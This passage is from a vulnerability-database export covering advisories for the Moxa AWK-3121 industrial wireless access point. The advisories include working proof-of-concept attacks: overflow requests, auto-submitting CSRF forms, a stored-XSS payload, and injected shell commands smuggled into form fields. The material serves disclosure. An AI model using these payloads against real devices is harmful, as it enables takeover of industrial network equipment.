set up the device can allow an\n attacker to sniff the traffic passing between the user\u0027s computer and the\n device. This can allow an attacker to steal the credentials passing\n over the HTTP connection as well as TELNET traffic. Also an attacker\n can MITM the response and infect a user\u0027s computer very easily as\n well. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Open WiFi Connection\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Device\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can monitor the Wifi channels using Kismet or some other\n opensource software and an wireless card in monitor mode and sniff all\n the traffic including HTTP traffic as well as SSH and Telnet traffic. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n6. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n POST /forms/web_SendTestEmail HTTP/1.1\n Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f\n \n server=server.mail.com\u0026username=test\u0026password=test\u0026from=test@mail.com\u0026to1=AAAAAAAAAA (etc.)\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute the buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n7. \n \n ------------------------------------------\n \n [Additional Information]\n POC to change name of the device \n \n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/iw_webSetParameters\" method=\"POST\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"iw_board_deviceName\" value=\"AWK-ROMEO\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceLocation\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceDescription\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceContactInfo\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"Submit\" value=\"Submit\" /\n \u003cinput type=\"hidden\" name=\"bkpath\" value=\"/sysinfo.asp \" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/webSetMainRestart\" method=\"GET\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"SaveValue\" value=\"1\" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [Vulnerability Type]\n Cross Site Request Forgery (CSRF)\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Escalation of Privileges]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can trick an administrator of the device to visit an\n attacker controlled page while connected to the network and thus trick\n to change the password or any other setting\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n8. \n The Moxa AWK 3121 provides ping functionality so that an administrator\n can execute ICMP calls to check if the network is working correctly. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \n POST /forms/webSetPingTrace HTTP/1.1\n Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333\n \n srvName=192.168.127.102;ping -c 8 192.168.127.101;##\u0026option=0\u0026bkpath=%2Fping_trace.asp\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in Ping functionality\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n9. \n The device enables an unencrypted TELNET service by default. This allows an\n attacker who has been able to gain an MITM position to easily sniff the\n traffic between the device and the user. Also an attacker can easily\n connect to the TELNET daemon using the default credentials if they have\n not been changed by the user. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Insecure service Telnet enabled by default\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Telnet daemon\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n10. \n The Moxa AWK 3121 provides certfile upload functionality so that an\n administrator can upload a certificate file used for connecting to the\n wireless network. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n POST /forms/web_certUpload HTTP/1.1\n Cookie: Password508=68abf30ef8176a4248320929e04df562\n \n ... 114782935826962\n Content-Disposition: form-data; name=\"iw_privatePass\"\n \n ;`ping -c 9 192.168.127.103` ##\n ... 114782935826962\n Content-Disposition: form-data; name=\"bkpath\"\n \n /wireless_cert.asp?index=1\n ... 114782935826962\n Content-Disposition: form-data; name=\"certSection\"\n \n certWlan\n ... 114782935826962\n Content-Disposition: form-data; name=\"rfindex\"\n \n 0\n ... 114782935826962\n Content-Disposition: form-data; name=\"Submit\"\n \n Submit\n ... 114782935826962\n Content-Disposition: form-data; name=\"certFile1\"\n \n test.txt\n ... 114782935826962\n Content-Disposition: form-data; name=\"certFile\"; filename=\"blob\"\n Content-Type: text/xml\n \n \u003ca id=\"a\"\u003cb id=\"b\"hey!\u003c/b\u003c/a\n ... 114782935826962--\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in file upload\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n11. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/iw_webSetParameters\" method=\"POST\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"iw_board_deviceName\" value=\"AWK\u003c\\/td\u0027);alert(1);//\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceLocation\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceDescription\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceContactInfo\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"Submit\" value=\"Submit\" /\n \u003cinput type=\"hidden\" name=\"bkpath\" value=\"/sysinfo.asp \" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [Vulnerability Type]\n Cross Site Scripting (XSS)\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.9\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Escalation of Privileges]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n12. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n POST /forms/web_runScript HTTP/1.1\n Cookie: Password508=071b1093656adca3510d5e32f69737ec\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_filename\"; filename=\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC\"\n Content-Type: application/octet-stream\n \n ls -ltr\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_storage\"\n \n tftp\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_serverip\"\n \n `ping -c 3 192.168.127.101`\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"bkpath\"\n \n /Troubleshooting.asp\n ... 7e21a62f2905ca--\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n13. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \n \u003chtml\n \u003cbody\n \u003cscript\n function submitRequest()\n {\n var formData = new FormData();\n \n formData.append(\"iw_filename\", \";`ping -c 9 192.168.127.103` ##\");\n formData.append(\"iw_storage\", \"tftp\");\n formData.append(\"iw_serverip\", \"192.168.1.101\");\n formData.append(\"bkpath\", \"/wireless_cert.asp?index=1\");\n \n // HTML file input, chosen by user\n formData.append(\"certFile1\", \"test.txt\");\n \n // JavaScript file-like object\n var content = \u0027\u003ca id=\"a\"\u003cb id=\"b\"hey!\u003c/b\u003c/a\u0027; // the body of the new file... \n var blob = new Blob([content], { type: \"text/xml\"});\n \n formData.append(\"certFile\", blob);\n \n var request = new XMLHttpRequest();\n request.open(\"POST\", \"http://192.168.127.253/forms/web_certUpload\");\n request.send(formData);\n }\n \u003c/script\n \u003cform action=\"#\"\n \u003cinput type=\"submit\" value=\"Submit request\" onclick=\"submitRequest();\" /\n \u003c/form\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in web runscript functionality\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n14. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n POST /forms/web_runScript HTTP/1.1\n Cookie: Password508=c629f1b9d18c3d751da6d7b1fd43e628\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_filename\"; filename=\"XXXX\"\n Content-Type: application/octet-stream\n \n ls -ltr\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_storage\"\n \n tftp\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_serverip\"\n \n AAAAAAAAAAAAAAAAAA (etc.)\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"bkpath\"\n \n /Troubleshooting.asp\n ... 7e21a62f2905ca--\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute the buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-10703"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015601"
},
{
"db": "VULHUB",
"id": "VHN-120489"
},
{
"db": "VULMON",
"id": "CVE-2018-10703"
},
{
"db": "PACKETSTORM",
"id": "153223"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "PACKETSTORM",
"id": "153223",
"trust": 2.7
},
{
"db": "NVD",
"id": "CVE-2018-10703",
"trust": 2.7
},
{
"db": "ICS CERT",
"id": "ICSA-19-337-02",
"trust": 1.4
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015601",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201906-331",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2019.4544",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-120489",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-10703",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120489"
},
{
"db": "VULMON",
"id": "CVE-2018-10703"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015601"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10703"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-331"
}
]
},
"id": "VAR-201906-0793",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-120489"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:00:03.991000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.moxa.com/en/"
},
{
"title": "Moxa_AWK_1121",
"trust": 0.1,
"url": "https://github.com/samuelhuntley/moxa_awk_1121 "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-10703"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015601"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120489"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015601"
},
{
"db": "NVD",
"id": "CVE-2018-10703"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "http://packetstormsecurity.com/files/153223/moxa-awk-3121-1.14-information-disclosure-command-execution.html"
},
{
"trust": 1.8,
"url": "https://seclists.org/bugtraq/2019/jun/8"
},
{
"trust": 1.8,
"url": "https://github.com/samuelhuntley/moxa_awk_1121/blob/master/moxa_awk_1121"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10703"
},
{
"trust": 1.4,
"url": "https://www.us-cert.gov/ics/advisories/icsa-19-337-02"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-10703"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4544/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/119.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/samuelhuntley/moxa_awk_1121"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10702"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10699"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10701"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10693"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10698"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10695"
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/websetmainrestart\""
},
{
"trust": 0.1,
"url": "https://www.moxa.com/event/tech/2008/awk-3121/index.htm"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10696"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10690"
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/iw_websetparameters\""
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/web_certupload\");"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10694"
},
{
"trust": 0.1,
"url": "http://192.168.127.253//systemlog.log"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10691"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10697"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10700"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10692"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120489"
},
{
"db": "VULMON",
"id": "CVE-2018-10703"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015601"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10703"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-331"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-120489"
},
{
"db": "VULMON",
"id": "CVE-2018-10703"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015601"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10703"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-331"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-07T00:00:00",
"db": "VULHUB",
"id": "VHN-120489"
},
{
"date": "2019-06-07T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10703"
},
{
"date": "2019-06-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015601"
},
{
"date": "2019-06-07T22:22:22",
"db": "PACKETSTORM",
"id": "153223"
},
{
"date": "2019-06-07T20:29:00.810000",
"db": "NVD",
"id": "CVE-2018-10703"
},
{
"date": "2019-06-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-331"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-10T00:00:00",
"db": "VULHUB",
"id": "VHN-120489"
},
{
"date": "2019-06-10T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10703"
},
{
"date": "2019-12-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015601"
},
{
"date": "2019-06-10T23:29:02.420000",
"db": "NVD",
"id": "CVE-2018-10703"
},
{
"date": "2019-12-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-331"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-331"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa AWK-3121 Device buffer error vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015601"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-331"
}
],
"trust": 0.6
}
}
VAR-201906-0781
Vulnerability from variot - Updated: 2023-12-18 12:00An issue was discovered on Moxa AWK-3121 1.14 devices. It is intended that an administrator can download /systemlog.log (the system log). However, the same functionality allows an attacker to download the file without any authentication or authorization. Moxa AWK-3121 The device contains an access control vulnerability.Information may be obtained. MoxaAWK-3121 is an industrial-grade wireless access point for Moxa Corporation of Taiwan, China. An access control error vulnerability exists in Moxa's AWK-31211.14 release. The device by default allows HTTP traffic thus providing an insecure communication mechanism for a user connecting to the web server. This allows an attacker to sniff the traffic easily and allows an attacker to compromise sensitive data such as credentials.
[VulnerabilityType Other] HTTP traffic by default
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC http://192.168.127.253//systemlog.log
[Vulnerability Type] Incorrect Access Control
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can navigate to URL and download the systemlog file without any authentication or authorization
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The session cookie "Password508" does not have an HttpOnly flag. This allows an attacker who is able to execute a cross-site scripting attack to steal the cookie very easily.
[VulnerabilityType Other] Missing HttpOnly flag on session cookie
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can use cross-site scripting attack to access the session cookie "Password508" which can allow an attacker to login into the device.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly. The POST parameter "srvName" is susceptible to a buffer overflow. By crafting a packet that contains a string of 516 characters, it is possible for an attacker to execute the attack.
[Additional Information] POC
POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0
srvName=AAAAAA (etc.) EEEEEE&option=0&bkpath=%2Fping_trace.asp
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The device provides a Wi-Fi connection that is open and does not use any encryption mechanism by default. An administrator who uses the open wireless connection to set up the device can allow an attacker to sniff the traffic passing between the user's computer and the device. This can allow an attacker to steal the credentials passing over the HTTP connection as well as TELNET traffic. Also an attacker can MITM the response and infect a user's computer very easily as well.
[VulnerabilityType Other] Open WiFi Connection
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Device
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can monitor the Wifi channels using Kismet or some other opensource software and an wireless card in monitor mode and sniff all the traffic including HTTP traffic as well as SSH and Telnet traffic.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It provides alert functionality so that an administrator can send emails to his/her account when there are changes to the device's network. The POST parameters "to1,to2,to3,to4" are all susceptible to buffer overflow. By crafting a packet that contains a string of 678 characters, it is possible for an attacker to execute the attack.
[Additional Information] POC POST /forms/web_SendTestEmail HTTP/1.1 Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f
server=server.mail.com&username=test&password=test&from=test@mail.com&to1=AAAAAAAAAA (etc.)
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute the buffer overflow
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The device provides a web interface to allow an administrator to manage the device. However, this interface is not protected against CSRF attacks, which allows an attacker to trick an administrator into executing actions without his/her knowledge, as demonstrated by the forms/iw_webSetParameters and forms/webSetMainRestart URIs.
[Additional Information] POC to change name of the device
<html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK-ROMEO" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
<html <body <form id="f" action="http://192.168.127.253/forms/webSetMainRestart" method="GET" enctype="application/x-www-form-urlencoded" <input type="hidden" name="SaveValue" value="1" / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
[Vulnerability Type] Cross Site Request Forgery (CSRF)
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Impact Escalation of Privileges] true
[Impact Information Disclosure] true
[Attack Vectors] An attacker can trick an administrator of the device to visit an attacker controlled page while connected to the network and thus trick to change the password or any other setting
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The Moxa AWK 3121 provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly. The POST parameter "srvName" is susceptible to this injection. By crafting a packet that contains shell metacharacters, it is possible for an attacker to execute the attack.
[Additional Information] POC
POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333
srvName=192.168.127.102;ping -c 8 192.168.127.101;##&option=0&bkpath=%2Fping_trace.asp
[VulnerabilityType Other] Command injection in Ping functionality
[Vendor of Product] Moxa
